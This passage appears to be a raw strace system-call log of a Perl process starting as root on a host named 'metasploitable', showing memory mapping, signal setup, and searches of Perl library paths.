\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

9989  07:30:49.934124 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

9989  07:30:49.934140 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d66000

9989  07:30:49.934151 mmap2(0xb7d6f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d6f000

9989  07:30:49.934165 mmap2(0xb7d71000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d71000

9989  07:30:49.934178 close(1)          = 0

9989  07:30:49.934201 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d65000

9989  07:30:49.934214 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d658c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

9989  07:30:49.934272 mprotect(0xb7ee1000, 4096, PROT_READ) = 0

9989  07:30:49.934299 munmap(0xb7f29000, 29913) = 0

9989  07:30:49.934311 set_tid_address(0xb7d65908) = 9989

9989  07:30:49.934320 set_robust_list(0xb7d65910, 0xc) = 0

9989  07:30:49.934357 futex(0xbff00ba0, 0x81 /* FUTEX_??? */, 1) = 0

9989  07:30:49.934372 rt_sigaction(SIGRTMIN, {0xb7eeb2c0, [], SA_SIGINFO}, NULL, 8) = 0

9989  07:30:49.934399 rt_sigaction(SIGRT_1, {0xb7eeb340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

9989  07:30:49.934412 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

9989  07:30:49.934425 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

9989  07:30:49.934445 uname({sys="Linux", node="metasploitable", ...}) = 0

9989  07:30:49.934490 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

9989  07:30:49.934535 brk(0)            = 0x8153000

9989  07:30:49.934544 brk(0x8174000)    = 0x8174000

9989  07:30:49.934587 getuid32()        = 0

9989  07:30:49.934597 geteuid32()       = 0

9989  07:30:49.934606 getgid32()        = 0

9989  07:30:49.934615 getegid32()       = 0

9989  07:30:49.934651 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d44000

9989  07:30:49.934680 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

9989  07:30:49.934696 read(1, "\231\\\332w", 4) = 4

9989  07:30:49.934712 close(1)          = 0

9989  07:30:49.934730 time(NULL)        = 1495625449

9989  07:30:49.934770 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbff00870) = -1 ENOENT (No such file or directory)

9989  07:30:49.934787 stat64("/usr/local/lib/site_perl/5.8.8", 0xbff00870) = -1 ENOENT (No such file or directory)

9989  07:30:49.934803 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbff00870) = -1 ENOENT (No such file or directory)

9989  07:30:49.934819 stat64("/usr/local/lib/perl/5.8.7", 0xbff009b0) = -1 ENOENT (No such file or directory)

9989  07:30:49.934878 stat64("/usr/local/share/perl/5.8.7", 0xbff009b0) = -1 ENOENT (No such file or directory)

9989  07:30:49.934923 stat64("/usr/local/lib/perl/5.8.6", 0xbff009b0) = -1 ENOENT (No such file or directory)

9989  07:30:49.934947 stat64("/usr/local/share/perl/5.8.6", 0xbff009b0) = -1 ENOENT (No such file or directory)

9989  07:30:49.934959 stat64("/usr/local/lib/perl/5.8.4", 0xbff009b0) = -1 ENOENT (No such file or directory)

9989  07:30:49.934970 stat64("/usr/local/share/perl/5.8.4", 0xbff009b0) = -1 ENOENT (No such file or directory)

9989  07:30:49.934982 stat64("/usr/local/lib/perl/5.8.3", 0xbff009b0) = -1 ENOENT (No such file or directory)

